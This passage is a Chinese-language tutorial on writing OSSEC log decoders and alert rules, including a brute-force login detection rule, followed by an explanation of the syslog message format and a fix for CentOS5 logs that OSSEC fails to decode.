**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.

用户通过配置上述正则表达式,获取特定字段,用于后续的关联分析。OSSEC一共内置了14个用户可解析的字段:

   - location - where the log came from (only on FTS)

   - srcuser  - extracts the source username

   - dstuser  - extracts the destination (target) username

   - user     - an alias to dstuser (only one of the two can be used)

   - srcip    - source ip

   - dstip    - dst ip

   - srcport  - source port

   - dstport  - destination port

   - protocol - protocol

   - id       - event id 

   - url      - url of the event

   - action   - event action (deny, drop, accept, etc)

   - status   - event status (success, failure, etc)

   - extra_data     - Any extra data

3. 自定义日志告警规则

3.1 规则文件路径配置

OSSEC的规则配置文件默认路径为/var/ossec/rules/,要加载规则文件,需要在/var/ossec/etc/ossec.conf 中配置,默认的配置如下:

 <ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>                                                                                                                                                                                                     
     ......                                                                                                                                                                                     
    <include>clam_av_rules.xml</include>                                                                                                                                                                                                      
    <include>bro-ids_rules.xml</include>                                                                                                                                                                                                      
    <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
    <include>local_rules.xml</include>                                                                                                                                                                                                        
</rules>                                                                                                                                                                                                                                      
</ossec_config>  <!-- rules global entry -->

其实通过下列配置,可以实现加载/var/ossec/rules 下的所有规则文件:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

于泛化规则,也可以通过配置decoder_dir域来实现,如:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

上述配置可将/var/ossec/rules/plugins/plugins/decoders目录下所有的xml文件都添加为OSSEC日志泛化规则。

对于更详细的配置及语法,可参考下列文档:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

 

3.2 OSSEC告警规则配置

例如,我们需要增加对程序auditServerd的告警规则,我们需要针对auditServerd程序新建一个规则文件,对于OSSEC中已经存在的规则文件如sshd, openbsd, vsftpd等,我们只需要在对应的文件中进行新增或修改。

首先我们新建文件

/var/ossec/rules/auditServerd_rules.xml

添加如下内容:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>
</group>

上述规则中,规则id 80000 用于对日志进行分组计数,假如日志中出现了泛化为auditServerd的日志,则对该日志分组为auditServer,且状态机计数加1.

规则80001描述了假如user为blackrat,srcip为172.17.153.36 则命中,并发出“User blackrat is not allowed login from 172.17.153.36!”的告警。

将该文件路径加入到文件/var/ossec/etc/ossec.conf中

  …
 <include>dropbear_rules.xml</include>                                                                                                                                                                                                     
<include>local_rules.xml</include> 
<include>auditServerd_rules.xml</include>                                                                                                                                                                                                       
</rules>                                                                                                                                                                                                                                      
</ossec_config>

执行/var/ossec/bin/ossec-logtest,结果如下:

**Phase 1: Completed pre-decoding.
       full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
       hostname: '172.17.153.38/172.16.24.32'
       program_name: '/usr/bin/auditServerd'
       log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
       decoder: 'auditServerd'
       dstuser: 'blackrat'
       status: 'SUCEESS'
       srcip: '172.17.153.36'
       dstip: '172.17.153.38'
       dstport: '3333'

**Phase 3: Completed filtering (rules).
       Rule id: '80001'
       Level: '10'
       Description: 'User blackrat is not allowed login from 172.17.153.36!'
**Alert to be generated.

3.3 关联分析告警规则

OSSEC可以实现基于因果关系、事件频次的关联分析告警,具体实现方式如下。

假如我们想要实现当来自同一IP的用户登陆auditServerd,在1分钟内达到5次登录失败时,进行告警,我们可以配置规则如下:

<group name="auditServer,">
   <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <match>SUCEESS</match>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>

  <rule id="80002" level="1">
    <if_sid>80000</if_sid>
    <match>PWD_ERROR</match>
    <group>authServer_login_failures,</group>
    <description>login auditServerd password error.</description>
  </rule>

  <rule id="80003" level="15" frequency="5" timeframe="60" ignore="30"> 
    <if_matched_group>authServer_login_failures</if_matched_group>
    <description>auditServerd brute force trying to get access to </description>       
    <description>the audit system.</description>
    <same_source_ip />
    <group>authentication_failures,</group>
  </rule>
</group>

执行/var/ossec/bin/ossec-logtest,连续五次输入日志:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

结果如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status: 'PWD_ERROR'
srcip: '172.17.153.36'
dstip: '172.17.153.38'
dstport: '3333'

**Phase 3: Completed filtering (rules).
Rule id: '80003'
Level: '15'
Description: 'auditServerd brute force trying to get access to the audit system.'
**Alert to be generated.

对于OSSEC日志告警规则更详细的语法,参见:
http://ossec-docs.readthedocs.org/en/latest/syntax/head_rules.html

对于OSSEC中正则表达式的语法,参加:
http://ossec-docs.readthedocs.org/en/latest/syntax/regex.html

文章出处:
http://www.freebuf.com/articles/network/36484.html

syslog的包如下:

123

在Unix类操作系统上,syslog广泛应用于系统日志。syslog日志消息既可以记录在本地文件中,也可以通过网络发送到接收syslog的服务器。接收syslog的服务器可以对多个设备的syslog消息进行统一的存储,或者解析其中的内容做相应的处理。常见的应用场景是网络管理工具、安全管理系统、日志审计系统。

完整的syslog日志中包含产生日志的程序模块(Facility)、严重性(Severity或 Level)、时间、主机名或IP、进程名、进程ID和正文。在Unix类操作系统上,能够按Facility和Severity的组合来决定什么样的日志消息是否需要记录,记录到什么地方,是否需要发送到一个接收syslog的服务器等。由于syslog简单而灵活的特性,syslog不再仅限于 Unix类主机的日志记录,任何需要记录和发送日志的场景,都可能会使用syslog。

例如:
<86>Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2
这是authpriv的log可以看到由3部分组成,分别是PRI、HEADER和MSG。大部分syslog都包含PRI和MSG部分,而HEADER可能没有。
1)pri
PRI部分由尖括号包含的一个数字构成,这个数字包含了程序模块(Facility)、严重性(Severity),这个数字是由Facility乘以 8,然后加上Severity得来。
这个数字如果换成2进制的话,低位的3个bit表示Severity,剩下的高位的部分右移3位,就是表示Facility的值。
十进制181 = 二进制10110101
二进制10110 = 十进制22 对应local6
二进制101 = 十进制5 对应Notice

Facility的定义如下,可以看出来syslog的Facility是早期为Unix操作系统定义的,不过它预留了User(1),Local0~7 (16~23)给其他程序使用:

      Numerical             Facility
         Code

          0             kernel messages
          1             user-level messages
          2             mail system
          3             system daemons
          4             security/authorization messages (note 1)
          5             messages generated internally by syslogd
          6             line printer subsystem
          7             network news subsystem
          8             UUCP subsystem
          9             clock daemon (note 2)
         10             security/authorization messages (note 1)
         11             FTP daemon
         12             NTP subsystem
         13             log audit (note 1)
         14             log alert (note 1)
         15             clock daemon (note 2)
         16             local use 0  (local0)
         17             local use 1  (local1)
         18             local use 2  (local2)
         19             local use 3  (local3)
         20             local use 4  (local4)
         21             local use 5  (local5)
         22             local use 6  (local6)
         23             local use 7  (local7)

Severity的定义如下:

       Numerical         Severity
        Code

         0       Emergency: system is unusable
         1       Alert: action must be taken immediately
         2       Critical: critical conditions
         3       Error: error conditions
         4       Warning: warning conditions
         5       Notice: normal but significant condition
         6       Informational: informational messages
         7       Debug: debug-level messages

2)header
HEADER部分包括两个字段,时间和主机名(或IP)。
时间紧跟在PRI后面,中间没有空格,格式必须是“Mmm dd hh:mm:ss”,不包括年份。

3)Message
MSG部分又分为两个部分,TAG和Content。其中TAG部分是可选的。
sshd[32390]就是TAG部分,包含了进程名称和进程PID。
TAG后面用一个冒号隔开Content部分,这部分的内容是应用程序自定义的。

 

首先在服务端抓Syslog包可以抓到。
然后我们看下CentOS5收到的syslog的内容

123

我们发现CentOS5发送的syslog少了header部分,没有时间、主机名或IP信息。
完整的Syslog日志例如CentOS6如下:

123

我们使用/opt/ossec/bin/ossec-logtest -v 添加参数v可以使输出更详细
CentOS6的测试结果如下:

Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2


**Phase 1: Completed pre-decoding.
       full event: 'Aug 26 15:00:14 localhost sshd[32390]: Failed password for admin from 192.168.190.201 port 61410 ssh2'
       hostname: 'localhost'
       program_name: 'sshd'
       log: 'Failed password for admin from 192.168.190.201 port 61410 ssh2'

**Phase 2: Completed decoding.
       decoder: 'sshd'
       dstuser: 'admin'
       srcip: '192.168.190.201'

**Phase 3: Completed filtering (rules).
       Rule id: '5716'
       Level: '5'
       Description: 'SSHD authentication failed.'
**Alert to be generated.

可以看到第一个阶段为预解码阶段,就是提取时间,主机名(localhost),程序名称(sshd)。
第二个阶段为解码阶段,会匹配第一个阶段中的log内容,根据decode.xml解析。
第三个阶段为规则匹配,命中规则5716。

CentOS5的测试结果如下:
输出如下:

sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2


**Phase 1: Completed pre-decoding.
       full event: 'sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'sshd[20237]: Failed password for admin from 10.59.0.85 port 41497 ssh2'

**Phase 2: Completed decoding.
       No decoder matched.

**Phase 3: Completed filtering (rules).
       Rule id: '1002'
       Level: '2'
       Description: 'Unknown problem somewhere in the system.'
**Alert to be generated.

可以看到CentOS5无法没有匹配上解码器。
而看到匹配上了1002规则,我们来看下1002规则
<rule id=”1002″ level=”2″>
<match>$BAD_WORDS</match>
<options>alert_by_email</options>
<description>Unknown problem somewhere in the system.</description>
</rule>
<var name=”BAD_WORDS”>core_dumped|failure|error|attack|bad |illegal |denied|refused|unauthorized|fatal|failed|Segmentation Fault|Corrupted</var>
可以看到是因为匹配上了关键字failed导致。
所以无法成功告警是因为解码器没有匹配上,根本原因是CentOS5日志格式没有header信息。
解决办法:
在CentOS5上安装rsyslog,并关闭syslog服务。